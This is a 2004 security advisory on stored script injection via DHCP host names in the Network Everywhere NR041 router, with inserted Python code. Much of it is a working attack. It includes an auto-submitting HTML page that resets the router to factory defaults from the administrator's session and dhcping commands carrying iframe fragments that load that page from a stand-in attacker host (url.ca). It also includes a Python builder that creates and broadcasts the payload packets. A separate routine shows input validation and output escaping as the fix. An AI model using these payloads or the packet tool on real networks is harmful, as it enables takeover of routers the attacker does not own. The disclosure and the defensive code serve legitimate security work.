Network Security Exploits-HackingTools
[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP

Subject: [NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP
Date: 2 Sep 2004 12:55:40 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  NetworkEverywhere Router Model NR041 Script Injection via DHCP
------------------------------------------------------------------------


SUMMARY

The Network Everywhere NR041 Cable/DSL 4-port router 
(http://www.networkeverywhere.com/products/nr041.asp) "connects multiple PCs 
to your Cable or DSL modem. The router lets your PCs share one IP address 
from your ISP, files, printers and other resources. It can also function as 
a DHCP server for easy IP assignment".

The router does not filter the DHCP host name option (option 12) that 
clients send in their requests before storing it and later displaying it in 
the web-based administrative interface. Script code supplied as a host name 
is therefore stored on the router and rendered to the administrator.

DETAILS

Vulnerable Systems:
 * NR041 firmware revision 1.2 release 03

Because the router does not filter out potentially problematic content, 
script code can be injected into the web-based administrative interface 
through a DHCP request. When the administrator later views the DHCP page of 
that interface, the browser executes the injected script within the open, 
authenticated administrative session, so the script has the same access to 
the router as the administrator. One simple attack is to have the script 
reset the router to its factory defaults, which also rolls the 
administration password back to its default.
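The flaw described above is a stored cross-site scripting issue, and the fix belongs in two places: validate the host name when the DHCP server accepts the lease, and escape every stored value when the client table is rendered. The following Python is an added illustration, not code from the advisory or from the router's firmware; the table layout, the newest-first ordering of entries and the 15-character host name limit are assumptions taken from the advisory's description, and the three host names are the advisory's fragments (url.ca is its placeholder for the attacker's host). Note that the hardened renderer escapes single quotes as well, because the payload relies on quotes left open in one entry being closed by the next.

```python
import html
import re

# Constructed DHCP client table as the router might hold it after the three
# DHCPDISCOVERs in the advisory; the newest-first ordering is an assumption.
CLIENTS = [
    ("192.168.1.123", "af:af:af:af:af:ad", "<iframe id=' "),
    ("192.168.1.122", "af:af:af:af:af:ae", "'src='//url.ca/"),
    ("192.168.1.121", "af:af:af:af:af:af", "/../a.htm' > "),
]

# One label of at most 15 characters: letters, digits and interior hyphens
# (RFC 952/1123 syntax); anything else is not a host name and is refused.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,13}[A-Za-z0-9])?$")


def accept_hostname(name):
    """Intake check the DHCP server should apply before storing option 12."""
    return bool(HOSTNAME_RE.match(name))


def store_leases(requests):
    """Simulated intake: keep only leases whose host name passes validation."""
    return [(ip, mac, name) for ip, mac, name in requests if accept_hostname(name)]


def render_vulnerable(clients):
    """The flaw as described: client-supplied names pasted straight into HTML."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (ip, mac, name)
        for ip, mac, name in clients
    )
    return "<table>" + rows + "</table>"


def render_hardened(clients):
    """Output encoding: every stored value is escaped, quotes included, so a
    name can neither open a tag nor close an attribute in a neighbouring row."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td><td>%s</td></tr>"
        % tuple(html.escape(v, quote=True) for v in (ip, mac, name))
        for ip, mac, name in clients
    )
    return "<table>" + rows + "</table>"


if __name__ == "__main__":
    print(render_vulnerable(CLIENTS))   # the fragments reassemble into a live <iframe>
    print(render_hardened(CLIENTS))     # the same entries, rendered as inert text
    print(store_leases(CLIENTS))        # with intake validation none of them is stored
```

Either measure alone stops this particular payload; applying both means a later change to the validation rule (for example to allow underscores) cannot silently reopen the rendering hole.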

Since the router's DHCP daemon is only reachable from the local network, the 
vulnerability is hard to exploit from outside: DHCP requests are link-local 
broadcasts, so the attacker needs to be able to emit DHCP packets on the 
router's LAN segment. Any host in that position can inject the payload.

A proof of concept can be carried out using DHCPing, available from 
http://c3rb3r.openwall.net/dhcping/.

The NR041 is configured through a web-based administrative interface built 
from several CGIs that are invoked with the HTTP POST method. Exploitation 
is not entirely easy under the circumstances: each stored host name is 
limited to 15 characters, and the payload cannot be split at arbitrary 
points, because whatever the router renders between two table entries ends 
up between the fragments. A known trick from the exploitation of the 
DLINK 614+ helps: the payload is spread over several DHCP leases, and each 
fragment leaves a quote open so that the markup between fragments is 
swallowed as part of an attribute value instead of breaking the tag.

 * Step 1:
Because there isn't enough room to perform adequate exploitation in one 
shot, a different approach is used: inject the code for an IFRAME that 
forces the browser to fetch a small HTML file, e.g. "a.htm", from a web 
site controlled by the attacker. That file contains a form which submits 
itself as soon as it is loaded. The code for such an HTML file is presented 
below; because of the length limitations, the filename should be as short 
as possible:
<html>
<head>
<!-- nothing is needed here: the form below submits itself on load -->
</head>
<body onload="document.xx.submit();">
<!-- POST to the router's passwd.cgi; the request carries the administrator's session -->
<form name="xx" method="post" action="http://192.168.1.1/passwd.cgi">
<input type="hidden" name="FactoryDefaults" value="Enable">
</form>
</body>
</html>

The attack carried out by this HTML file is to call passwd.cgi with the 
FactoryDefaults option set to Enable; the router accepts the request because 
it is issued from the administrator's authenticated browser session. The 
router's IP address is hardcoded in this file, but the attacker's web server 
can take it from the HTTP Referer header of the request for a.htm, since 
that request is made from within the router's own administrative page; the 
script then works seamlessly without prior knowledge of the address.

 * Step 2:
Inject the fragments of the IFRAME tag using DHCPing, one fragment per DHCP 
lease (each with its own client MAC address and requested IP), like so:

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad

Here url.ca stands for the attacker's web server. The fragments are sent in 
the order that makes the router's client table list them as 
<iframe id=' ... 'src='//url.ca/ ... /../a.htm' >: the single quote left 
open at the end of one fragment is closed by the next, so the table markup 
between the first two entries lands inside the id attribute, and the "/../" 
path segment is there to drop the markup that lands in the URL path of the 
src attribute, leaving a request for a.htm on the attacker's host.
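What each of the dhcping invocations above puts on the wire is a DHCPDISCOVER whose option 12 (Host Name) carries one payload fragment. The following Python builds and decodes such packets; it is an added example, not part of the advisory or of DHCPing. It assumes the 15-character limit the advisory reports for the router, uses the advisory's three fragments and MAC/IP pairs as built-in sample input, and keeps url.ca as the advisory's placeholder host; the transaction id is chosen at random unless given.

```python
import random
import socket
import struct

# Host-name length the router stores per lease, as reported in the advisory (assumed limit).
MAX_HOSTNAME = 15

# RFC 2131/2132 constants
BOOTREQUEST = 1
DHCPDISCOVER = 1
OPT_HOSTNAME = 12       # "Host Name" option, the field the router renders unescaped
OPT_REQUESTED_IP = 50
OPT_LEASE_TIME = 51
OPT_MSG_TYPE = 53
OPT_END = 255
MAGIC_COOKIE = b"\x63\x82\x53\x63"

# The three fragments from the advisory, each bound to its own MAC/IP so the
# router stores them as separate leases (url.ca is the advisory's placeholder host).
FRAGMENTS = [
    ("af:af:af:af:af:af", "192.168.1.121", "/../a.htm' > "),
    ("af:af:af:af:af:ae", "192.168.1.122", "'src='//url.ca/"),
    ("af:af:af:af:af:ad", "192.168.1.123", "<iframe id=' "),
]


def build_discover(mac, requested_ip, hostname, lease_time=3600, xid=None):
    """Return the bytes of a DHCPDISCOVER whose option 12 carries `hostname`."""
    name = hostname.encode("ascii")
    if len(name) > MAX_HOSTNAME:
        raise ValueError("fragment exceeds the router's %d-character limit" % MAX_HOSTNAME)
    if xid is None:
        xid = random.getrandbits(32)
    chaddr = bytes.fromhex(mac.replace(":", "")).ljust(16, b"\x00")
    zero4 = b"\x00" * 4
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        BOOTREQUEST, 1, 6, 0,        # op, htype=Ethernet, hlen=6, hops
        xid, 0, 0x8000,              # xid, secs, flags: ask for a broadcast reply
        zero4, zero4, zero4, zero4,  # ciaddr, yiaddr, siaddr, giaddr
        chaddr, b"\x00" * 64, b"\x00" * 128,   # chaddr, sname, file
    )
    options = (
        bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
        + bytes([OPT_REQUESTED_IP, 4]) + socket.inet_aton(requested_ip)
        + bytes([OPT_LEASE_TIME, 4]) + struct.pack("!I", lease_time)
        + bytes([OPT_HOSTNAME, len(name)]) + name
        + bytes([OPT_END])
    )
    return header + MAGIC_COOKIE + options


def parse_options(packet):
    """Decode the option field after the magic cookie into {code: raw value}."""
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(packet) and packet[i] != OPT_END:
        if packet[i] == 0:           # pad option has no length byte
            i += 1
            continue
        code, length = packet[i], packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def fragment_packets():
    """One DHCPDISCOVER per fragment, in the order the advisory sends them."""
    return [build_discover(mac, ip, name) for mac, ip, name in FRAGMENTS]


def send_discover(packet, bind_ip="0.0.0.0"):
    """Broadcast one packet from UDP 68 to 67 (needs privileges; not run on import)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.bind((bind_ip, 68))
        s.sendto(packet, ("255.255.255.255", 67))


if __name__ == "__main__":
    for pkt in fragment_packets():
        # send_discover(pkt) would put each one on the LAN; here we only decode them
        print(parse_options(pkt)[OPT_HOSTNAME])
```

The builder refuses fragments longer than the router's limit up front, which is the check to run while laying out a payload; the parser is the same walk a DHCP server performs, and it is the point at which a server should apply host name validation before the value reaches any lease table.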


ADDITIONAL INFORMATION

The information has been provided by Mathieu Lacroix (Daemonz@videotron.ca).




DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 